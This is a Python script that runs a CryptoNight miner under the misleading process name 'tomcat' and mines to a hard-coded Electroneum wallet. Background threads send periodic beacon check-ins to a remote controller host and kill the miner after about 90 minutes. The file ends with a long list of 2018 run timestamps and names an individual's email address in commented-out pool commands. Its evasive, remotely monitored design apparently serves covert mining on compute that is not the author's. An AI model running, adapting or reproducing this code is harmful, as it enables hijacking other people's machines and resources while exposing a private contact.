import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:10:08.080568
#2018-02-17 15:57:05.211871
#2018-02-17 17:46:06.690266
#2018-02-17 19:35:07.062994
#2018-02-17 21:25:03.955046
#2018-02-17 23:09:01.518656
#2018-02-18 00:56:05.539319
#2018-02-18 02:44:04.116379
#2018-02-18 04:32:07.122434
#2018-02-18 06:23:04.472208
#2018-02-18 08:11:01.960122
#2018-02-18 09:57:05.970880
#2018-02-18 11:45:05.444196
#2018-02-18 13:31:03.488548
#2018-02-18 15:21:04.024982
#2018-02-18 17:10:05.980413
#2018-02-18 18:57:06.960825
#2018-02-18 20:44:03.839931
#2018-02-18 22:29:03.750805
#2018-02-19 00:18:05.397904
#2018-02-19 02:04:06.207451
#2018-02-19 03:51:06.516828
#2018-02-19 05:36:03.887168
#2018-02-19 07:25:01.390376
#2018-02-19 09:15:01.734501
#2018-02-19 11:04:08.086926
#2018-02-19 12:51:08.731781
#2018-02-19 14:39:06.517505
#2018-02-19 16:27:01.558605
#2018-02-19 18:13:09.712517
#2018-02-19 20:00:01.847139
#2018-02-19 21:48:06.650180
#2018-02-19 23:35:07.490473
#2018-02-20 01:22:02.212507
#2018-02-20 03:12:06.788081
#2018-02-20 05:00:05.484267
#2018-02-20 06:44:02.059834
#2018-02-20 08:29:08.011902
#2018-02-20 10:14:07.118931
#2018-02-20 11:58:04.307666
#2018-02-20 13:45:11.299697
#2018-02-20 15:29:05.085526
#2018-02-20 17:14:06.847483
#2018-02-20 19:05:05.789609
#2018-02-20 20:55:06.819681
#2018-02-20 22:39:08.552378
#2018-02-21 00:21:05.831509
#2018-02-21 02:06:06.933447
#2018-02-21 03:54:01.591580
#2018-02-21 05:42:07.249839
#2018-02-21 07:30:04.058422
#2018-02-21 09:14:07.428530
#2018-02-21 11:03:06.400993
#2018-02-21 12:51:01.584177
#2018-02-21 14:39:05.524527
#2018-02-21 16:26:03.043942
#2018-02-21 18:16:10.560771
#2018-02-21 20:03:07.553995
#2018-02-21 21:50:02.896819
#2018-02-21 23:35:08.899524
#2018-02-22 01:23:07.018582
#2018-02-22 03:11:07.173023
#2018-02-22 04:57:01.351223
#2018-02-22 06:40:07.248714
#2018-02-22 08:28:07.873022
#2018-02-22 10:15:09.912806
#2018-02-22 12:01:04.314396
#2018-02-22 13:46:08.186895
#2018-02-22 15:36:06.147832
#2018-02-22 17:21:07.795334
#2018-02-22 19:09:01.858573
#2018-02-22 21:01:14.768619
#2018-02-22 22:47:05.809983
#2018-02-23 00:35:01.388137
#2018-02-23 02:22:07.439243
#2018-02-23 04:12:05.201264
#2018-02-23 05:58:01.500822
#2018-02-23 07:47:05.765545
#2018-02-23 09:48:06.183775
#2018-02-23 11:48:06.493708
#2018-02-23 13:39:09.410314
#2018-02-23 15:27:02.045120
#2018-02-23 17:16:04.387725
#2018-02-23 18:59:06.111128
#2018-02-23 20:46:07.261866
#2018-02-23 22:35:07.254319
#2018-02-24 00:21:03.624014
#2018-02-24 02:12:07.466995
#2018-02-24 04:01:04.149851
#2018-02-24 05:46:05.545696
#2018-02-24 07:34:05.327240
#2018-02-24 09:21:05.586346
#2018-02-24 11:14:06.816843
#2018-02-24 13:03:05.258685
#2018-02-24 14:50:08.434966
#2018-02-24 16:42:01.729606
#2018-02-24 18:30:07.796178
#2018-02-24 20:16:04.759311
#2018-02-24 22:07:01.476527
#2018-02-25 01:04:04.917146
#2018-02-25 03:57:01.995570
#2018-02-25 06:42:01.399972
#2018-02-25 11:36:08.642322
#2018-02-25 13:49:01.922328
#2018-02-25 15:23:01.964723